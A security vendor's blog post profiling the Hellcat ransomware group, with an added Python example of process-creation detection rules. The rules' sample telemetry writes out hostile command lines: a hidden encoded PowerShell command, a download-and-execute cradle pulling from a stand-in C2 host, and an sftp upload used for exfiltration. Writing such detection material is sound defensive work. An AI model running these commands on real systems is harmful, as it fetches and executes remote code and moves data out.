
Ransomware remains a top cybersecurity threat, with attack costs soaring to $2.73 million per incident, nearly $1 million higher than in 2023, according to Sophos. As ransomware operations grow in complexity, new threat groups continue to emerge, seeking massive financial gains. One such group is Hellcat, a newly identified Ransomware-as-a-Service (RaaS) threat group first spotted in late 2024.
Hellcat has quickly made a name for itself with high-profile intrusions across various industries, targeting critical national infrastructure, major corporations, and government entities. The group has already claimed responsibility for breaches at Schneider Electric, Telefónica, Pinger, and Israel’s Knesset. Last week, Orange Group confirmed a security breach in its Romanian operations after a Hellcat affiliate leaked thousands of internal files, including employee records.
Hellcat Ransomware Group Attacks Detection
As Cybersecurity Ventures predicts, ransomware attacks will occur every two seconds by 2031, making proactive detection essential for cyber defenders. The newly emerged Hellcat ransomware group poses a novel menace, further amplifying this disturbing trend. To spot potential intrusions at the earliest stages, the SOC Prime Platform for collective cyber defense provides a global active threats feed of real-time threat intelligence and relevant detection rules, backed by a complete product suite for automated threat hunting, AI-powered detection engineering, and advanced threat detection.
Hit the Explore Detections button below to immediately drill down to a dedicated rule stack addressing Hellcat ransomware attacks. All the rules are compatible with multiple SIEM, EDR, and Data Lake solutions and mapped to the MITRE ATT&CK framework. Additionally, every rule is enriched with extensive metadata, including threat intel references, attack timelines, triage recommendations, and more.
Security professionals seeking more detection content covering ransomware attacks globally can search Threat Detection Marketplace with the “Ransomware” tag to support their investigation.
Also, security experts might use Uncoder AI, the industry-first AI co-pilot for Detection Engineering, to instantly hunt for indicators of compromise provided in Bridewell research on Hellcat ransomware. Uncoder AI acts as an IOC packager, enabling cyber defenders to effortlessly interpret IOCs and generate tailored hunting queries. These queries can then be seamlessly integrated into their preferred SIEM or EDR systems for immediate execution.
Hellcat Ransomware Attacks Analysis
In late December 2024, security researchers identified the emergence of a new ransomware-as-a-service collective operating under the name Hellcat. Before the group’s official formation, Hellcat members were observed carrying out individual attacks on prominent IT companies, including Dell and Capgemini. Later, in Q4 2024, the group began operating collectively, targeting high-profile organizations such as Israel’s Knesset, Schneider Electric, Telefónica, and others.
Hellcat operators employ a range of sophisticated techniques for gaining initial access, notably through phishing and exploiting exposed public-facing applications. Once inside, they implement complex PowerShell infection chains to maintain persistence, bypass security defenses, and establish command-and-control channels, facilitating the installation and execution of SliverC2 malware.
According to the research by Bridewell, the Hellcat group demonstrates a high level of operational security, employing a variety of secure communication tools such as TOX, Session, encrypted hard drives, air-gapped systems, anonymous VPS, MullvadVPN, and XMPP to mask their activities. While the specific use of these methods within attacks remains unclear, they highlight the group’s discipline and expertise in avoiding detection. Additionally, Hellcat utilizes custom ransomware payloads to encrypt data, along with custom scripts and Living-off-the-Land (LotL) binaries to fly under the radar. Their unique exfiltration tactics leverage SFTP and cloud services, further showcasing their sophisticated approach to cyber intrusions.
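The two preceding paragraphs describe the behaviours a defender can actually key on: phishing or an exposed public-facing application as the entry point, a PowerShell chain (encoded, hidden-window commands and download cradles) to stage a C2 implant, and LotL tooling such as SFTP to move data out. The following is an added example, not code from SOC Prime, Bridewell or any Hellcat sample, showing how those behaviours are expressed as simple process-creation detection rules and then correlated per host so that a multi-stage chain on one endpoint stands out from isolated hits. All hostnames, users, command lines, the base64 blob, the `SUSP-` rule identifiers and the `.invalid` addresses are constructed for the example; the ATT&CK technique IDs are the standard ones for each behaviour.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Callable, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (the fields Sysmon EID 1 or EDR telemetry carry)."""
    host: str
    user: str
    parent_image: str
    image: str
    cmdline: str


PS_IMAGES = {"powershell.exe", "pwsh.exe"}
SHELLS = PS_IMAGES | {"cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
WEB_WORKERS = {"w3wp.exe", "httpd.exe", "nginx.exe"}
TRANSFER_TOOLS = {"sftp.exe", "scp.exe", "pscp.exe", "winscp.exe", "rclone.exe"}

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob
ENCODED_RE = re.compile(r"(?i)\s-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}")
# hidden window or execution-policy bypass
HIDDEN_RE = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden|-e(?:p|xecutionpolicy)\s+bypass")
# classic download-and-execute cradle primitives
CRADLE_RE = re.compile(
    r"(?i)Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bIEX\b|Invoke-Expression")
# curl invoked to upload rather than fetch
CURL_UPLOAD_RE = re.compile(r"(?i)(^|\s)(-T|--upload-file|-d\s+@|--data-binary\s+@)")


def _is_ps(e: ProcEvent) -> bool:
    return e.image.lower() in PS_IMAGES


# (constructed rule id, ATT&CK technique, predicate over one event)
RULES: List[Tuple[str, str, Callable[[ProcEvent], bool]]] = [
    ("SUSP-OFFICE-SPAWN-SHELL", "T1566.001",
     lambda e: e.parent_image.lower() in OFFICE_PARENTS and e.image.lower() in SHELLS),
    ("SUSP-WEBSERVER-SPAWN-SHELL", "T1190",
     lambda e: e.parent_image.lower() in WEB_WORKERS and e.image.lower() in SHELLS),
    ("SUSP-PS-ENCODED-COMMAND", "T1059.001",
     lambda e: _is_ps(e) and ENCODED_RE.search(e.cmdline) is not None),
    ("SUSP-PS-HIDDEN-OR-BYPASS", "T1564.003",
     lambda e: _is_ps(e) and HIDDEN_RE.search(e.cmdline) is not None),
    ("SUSP-PS-DOWNLOAD-CRADLE", "T1105",
     lambda e: _is_ps(e) and CRADLE_RE.search(e.cmdline) is not None),
    ("SUSP-LOTL-FILE-TRANSFER", "T1048",
     lambda e: e.image.lower() in TRANSFER_TOOLS
     or (e.image.lower() == "curl.exe" and CURL_UPLOAD_RE.search(e.cmdline) is not None)),
]


def scan(events: List[ProcEvent]) -> List[Tuple[int, str, str]]:
    """Return (event_index, rule_id, technique) for every rule that fires on every event."""
    hits = []
    for i, ev in enumerate(events):
        for rule_id, technique, pred in RULES:
            if pred(ev):
                hits.append((i, rule_id, technique))
    return hits


def chained_hosts(events: List[ProcEvent], hits, min_rules: int = 2) -> List[str]:
    """Hosts on which at least `min_rules` distinct rules fired: several stages of the
    chain on one endpoint is a far stronger signal than any single noisy hit."""
    per_host = defaultdict(set)
    for i, rule_id, _ in hits:
        per_host[events[i].host].add(rule_id)
    return sorted(h for h, rules in per_host.items() if len(rules) >= min_rules)


# Constructed sample telemetry: two benign rows and one row per described stage.
SAMPLE_EVENTS = [
    ProcEvent("ws01", "CORP\\admin", "explorer.exe", "powershell.exe",
              "powershell.exe -ExecutionPolicy RemoteSigned -File C:\\ops\\patch.ps1"),
    ProcEvent("ws02", "CORP\\jsmith", "winword.exe", "powershell.exe",
              "powershell.exe -w hidden -ep bypass -enc QQBCAEMARABFAEYARwBIAEkASgBLAEwATQBOAE8AUAA="),
    ProcEvent("ws02", "CORP\\jsmith", "powershell.exe", "powershell.exe",
              "powershell.exe -nop -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('http://c2.example.invalid/s')\""),
    ProcEvent("web01", "IIS APPPOOL\\app", "w3wp.exe", "cmd.exe", "cmd.exe /c whoami"),
    ProcEvent("fs01", "CORP\\svc_backup", "cmd.exe", "sftp.exe",
              "sftp.exe -b upload.txt user@203.0.113.10"),
    ProcEvent("ws03", "CORP\\mlee", "cmd.exe", "curl.exe",
              "curl.exe https://intranet.example.invalid/status"),
]

if __name__ == "__main__":
    found = scan(SAMPLE_EVENTS)
    for i, rule_id, technique in found:
        ev = SAMPLE_EVENTS[i]
        print(f"{rule_id:28} {technique:10} {ev.host:6} {ev.parent_image} -> {ev.image}")
    print("hosts with a multi-stage chain:", chained_hosts(SAMPLE_EVENTS, found))
```

Each predicate here is the logic a Sigma rule for the same behaviour would carry; the point of `chained_hosts` is that a single encoded-PowerShell hit is routine in many estates, whereas an Office parent, an encoded hidden-window command and a download cradle on the same workstation within one session is the infection chain the research describes and deserves immediate triage.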
Notably, security experts revealed a significant overlap between the ransomware payloads used by Hellcat and Morpheus, and similar ransom notes are shared by both groups as well as by Underground Team. While analysts at SentinelOne identified nearly identical code in the Hellcat and Morpheus payloads, it’s unclear whether this points to collaboration or a shared source code. Both payloads also exhibit similar characteristics on VirusTotal, but there is insufficient evidence to confirm whether this overlap signifies coordination or the use of common templates.
Last week, a member of the Hellcat ransomware group announced the theft of thousands of internal documents from Orange Group, mostly originating from Orange’s Romanian branch. Orange confirmed the breach occurred on a non-critical application and is actively investigating to minimize its impact.
To proactively thwart sophisticated ransomware attacks, as well as any evolving threats, security teams can rely on SOC Prime Platform for collective cyber defense, offering an enterprise-ready product suite for building a future-proof cybersecurity strategy. Individual researchers can also gain personal access to SOC Prime Platform with new Solo subscriptions. Leverage Threat Detection Marketplace Solo for global threat feeds, tailored intel, and an extensive Sigma rule library, or use Uncoder AI Solo as a private IDE and co-pilot for detection engineering. Available now with 50% off annual plans via instant purchase using Stripe.
The post Detect Hellсat Ransomware Attacks: New Ransomware-as-a-Service Threat Group Targeting а Variety of High-Profile Organizations Globally appeared first on SOC Prime.